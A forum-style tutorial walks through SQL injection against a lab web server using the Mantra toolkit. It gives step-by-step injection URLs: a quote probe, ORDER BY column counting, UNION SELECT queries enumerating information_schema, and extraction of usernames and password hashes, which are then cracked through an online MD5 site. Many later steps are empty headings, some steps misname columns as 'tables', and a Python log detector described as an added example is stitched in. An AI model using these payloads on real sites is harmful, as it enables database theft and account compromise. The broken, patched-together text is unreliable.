Hi All,
In this tutorial we will be rooting a vulnerable web server using Mantra Security Toolkit.
Step 1:
Code:
http://192.168.132.128/
Step 2:
I went through all the pages of the web site and found a page with URL input.
Code:
http://192.168.132.128/?id=13
Step 3:
The power of the single quote. I'm checking whether the web site is vulnerable or not by putting a ' at the end of the URL and pressing Execute.
Code:
http://192.168.132.128/?id=13'
Since the page content is different from the previous one, I can be sure that the web page is vulnerable.
Step 5:
Code:
http://192.168.132.128/?id=13 order by 1
Step 6:
I have to keep on increasing the last number till I see any changes in the page. In usual practice it's gonna be a tedious task since there will be hundreds and thousands of tables if not more. But with this tool I can simply press the + button till I see any changes on the webpage.
Code:
http://192.168.132.128/?id=13 order by 7
Step 7:
Code:
http://192.168.132.128/?id=13 order by 7
Step 8:
Code:
http://192.168.132.128/?id=13 order by 8
Step 9:
Now let's go ahead and make a UNION statement. I just went to SQL > UNION SELECT STATEMENT.
Step 10:
I provided the number of tables. Since I got a different page on table 8, I can be sure that table 8 does not exist and there are only 7 tables.
Step 11:
Wonderful. I can see some numbers on the page now. Those are the vulnerable columns. Let's take the number 2.
Code:
http://192.168.132.128/?id=13 UNION SELECT 1,2,3,4,5,6,7
Step 12:
I replaced the number 2 in the URL with another SQL command; it got executed and the result is displayed on the page.
Code:
http://192.168.132.128/?id=13 UNION SELECT 1,user(),3,4,5,6,7
The current user is cms_user@localhost
Step 13:
Let's find out the version of the database. I replaced 2 in the URL with the version() command.
Code:
http://192.168.132.128/?id=13 UNION SELECT 1,version(),3,4,5,6,7
5.0.45 is the version
Step 14:
Code:
http://192.168.132.128/?id=13 UNION SELECT 1,table_name,3,4,5,6,7 from information_schema.tables
From this list I found "user" is an interesting table
Step 15:
Code:
http://192.168.132.128/?id=13 UNION SELECT 1,column_name,3,4,5,6,7 from information_schema.columns
Step 16:
Code:
http://192.168.132.128/?id=13 UNION SELECT 1,column_name,3,4,5,6,7 from information_schema.columns where table_name='user'
Step 17:
Code:
http://192.168.132.128/?id=13 UNION SELECT 1,user_username,3,4,5,6,7 from user
Step 18:
Code:
http://192.168.132.128/?id=13 UNION SELECT 1,user_password,3,4,5,6,7 from user
It's encrypted
Step 19:
Decrypting the password. I copied the MD5 hash, pasted it into hackbar and went to Encryption > MD5 Menu
> send to > md5.rednoize.com
Step 20:
Greetings.!!!
Step 24:
Step 33:
Step 35:
I clicked on the log.log file and it has the logs of my noisy SQL injection attacks
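The request sequence from the steps above is easy to spot in such a log. The following Python detector is an added example, not part of the original tutorial; the access-log format, the client addresses and the stage names are assumptions, and the patterns cover only the request shapes shown on this page.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Stage name -> pattern, applied to each decoded query-string value.
STAGES = {
    "quote_probe": re.compile(r"^\d+'$"),
    "order_by": re.compile(r"\border\s+by\s+\d+", re.I),
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "schema_enum": re.compile(r"\binformation_schema\.(tables|columns)\b", re.I),
}
# Assumed Common Log Format: client address first, then the quoted request line.
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*"')

def classify(target):
    """Return the set of injection stages seen in one request target."""
    hits = set()
    for _, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        for name, pattern in STAGES.items():
            if pattern.search(value):
                hits.add(name)
    return hits

def scan(lines, min_stages=2):
    """Map client -> stages, keeping clients that moved through several stages."""
    seen = defaultdict(set)
    for line in lines:
        m = LINE.match(line)
        if m:
            seen[m.group(1)] |= classify(m.group(2))
    return {c: sorted(s) for c, s in seen.items() if len(s) >= min_stages}

# Constructed sample log lines (documentation-range client addresses).
SAMPLE = [
    '198.51.100.7 - - [10/Jan/2024:10:00:01 +0000] "GET /?id=13 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [10/Jan/2024:10:00:05 +0000] "GET /?id=13%27 HTTP/1.1" 200 310',
    '198.51.100.7 - - [10/Jan/2024:10:00:09 +0000] "GET /?id=13%20order%20by%208 HTTP/1.1" 200 310',
    '198.51.100.7 - - [10/Jan/2024:10:00:14 +0000] "GET /?id=13%20UNION%20SELECT%201,2,3,4,5,6,7 HTTP/1.1" 200 5200',
    '198.51.100.7 - - [10/Jan/2024:10:00:20 +0000] "GET /?id=13%20UNION%20SELECT%201,table_name,3,4,5,6,7%20from%20information_schema.tables HTTP/1.1" 200 9000',
    '203.0.113.20 - - [10/Jan/2024:10:01:00 +0000] "GET /?id=13 HTTP/1.1" 200 5120',
    '203.0.113.20 - - [10/Jan/2024:10:01:30 +0000] "GET /?q=order+by+2 HTTP/1.1" 200 800',
]

if __name__ == "__main__":
    for client, stages in scan(SAMPLE).items():
        print(client, "->", ", ".join(stages))
```

Requiring at least two distinct stages per client keeps a single odd-looking query, like the second client's search string, from raising an alert.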
Step 37:
Step 39:
Step 41:
Confirmed.!!!
Step 42:
Step 43: